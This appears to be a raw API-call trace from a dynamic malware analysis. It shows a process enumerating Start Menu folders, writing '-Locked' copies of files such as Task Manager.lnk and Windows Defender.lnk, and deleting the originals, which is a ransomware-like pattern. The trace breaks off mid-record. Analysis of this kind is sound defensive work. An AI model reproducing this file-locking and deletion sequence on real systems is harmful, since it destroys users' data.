SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.219] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp", lpFilePart=0x0) returned 0x3c [0300.219] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\", lpFilePart=0x0) returned 0x3d [0300.220] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.220] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97389110, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97389110, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0300.221] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97389110, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97389110, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0300.221] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.221] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\desktop.ini-Locked", lpFilePart=0x0) returned 0x4f [0300.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.221] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.222] GetFileType (hFile=0x49c) returned 0x1 [0300.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.222] GetFileType (hFile=0x49c) returned 0x1 [0300.224] CloseHandle (hObject=0x49c) returned 1 [0300.224] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\desktop.ini", lpFilePart=0x0) returned 0x48 [0300.224] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini")) returned 1 [0300.225] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", lpFilePart=0x0) returned 0x41 [0300.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.225] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", lpFilePart=0x0) returned 0x41 [0300.225] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\", lpFilePart=0x0) returned 0x42 [0300.225] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.226] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.226] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5039f9c4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5039f9c4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5039f9c4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default Programs.lnk", cAlternateFileName="")) returned 1 [0300.226] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0300.226] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f772ff, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f772ff, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f772ff, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task Manager.lnk", cAlternateFileName="")) returned 1 [0300.227] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender.lnk", cAlternateFileName="")) returned 1 [0300.227] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0300.227] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.227] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", lpFilePart=0x0) returned 0x41 [0300.227] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\", lpFilePart=0x0) returned 0x42 [0300.228] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5039f9c4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5039f9c4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5039f9c4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default Programs.lnk", cAlternateFileName="")) returned 1 [0300.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x36e5585, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0300.228] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f772ff, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f772ff, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f772ff, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task Manager.lnk", cAlternateFileName="")) returned 1 [0300.229] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender.lnk", cAlternateFileName="")) returned 1 [0300.229] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender.lnk", cAlternateFileName="")) returned 0 [0300.229] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.229] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Default Programs.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Default Programs.lnk-Locked", lpFilePart=0x0) returned 0x5d [0300.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.230] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Default Programs.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\default programs.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.238] GetFileType (hFile=0x49c) returned 0x1 [0300.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.238] GetFileType (hFile=0x49c) returned 0x1 [0300.240] CloseHandle (hObject=0x49c) returned 1 [0300.240] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Default Programs.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Default Programs.lnk", lpFilePart=0x0) returned 0x56 [0300.240] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Default Programs.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\default programs.lnk")) returned 1 [0300.241] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Desktop.ini-Locked", lpFilePart=0x0) returned 0x54 [0300.241] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.241] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.241] GetFileType (hFile=0x49c) returned 0x1 [0300.241] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.241] GetFileType (hFile=0x49c) returned 0x1 [0300.243] CloseHandle (hObject=0x49c) returned 1 [0300.243] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Desktop.ini", lpFilePart=0x0) returned 0x4d [0300.243] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\desktop.ini")) returned 1 [0300.244] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Task Manager.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Task Manager.lnk-Locked", lpFilePart=0x0) returned 0x59 [0300.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.244] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Task Manager.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\task manager.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.244] GetFileType (hFile=0x49c) returned 0x1 [0300.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.244] GetFileType (hFile=0x49c) returned 0x1 [0300.245] CloseHandle (hObject=0x49c) returned 1 [0300.246] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Task Manager.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Task Manager.lnk", lpFilePart=0x0) returned 0x52 [0300.246] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Task Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\task manager.lnk")) returned 1 [0300.250] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows Defender.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows Defender.lnk-Locked", lpFilePart=0x0) returned 0x5d [0300.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0300.250] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows Defender.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\windows defender.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0300.250] GetFileType (hFile=0x49c) returned 0x1 [0300.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0300.250] GetFileType (hFile=0x49c) returned 0x1 [0300.252] CloseHandle (hObject=0x49c) returned 1 [0300.252] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows Defender.lnk", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows Defender.lnk", lpFilePart=0x0) returned 0x56 [0300.252] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\Windows Defender.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\system tools\\windows defender.lnk")) returned 1 [0300.253] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC", lpFilePart=0x0) returned 0x3e [0300.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.253] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC", lpFilePart=0x0) returned 0x3e [0300.253] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\", lpFilePart=0x0) returned 0x3f [0300.253] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.253] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.254] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0300.254] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0300.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0300.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0300.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0300.254] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC", lpFilePart=0x0) returned 0x3e [0300.254] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\", lpFilePart=0x0) returned 0x3f [0300.254] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0300.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0300.255] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, 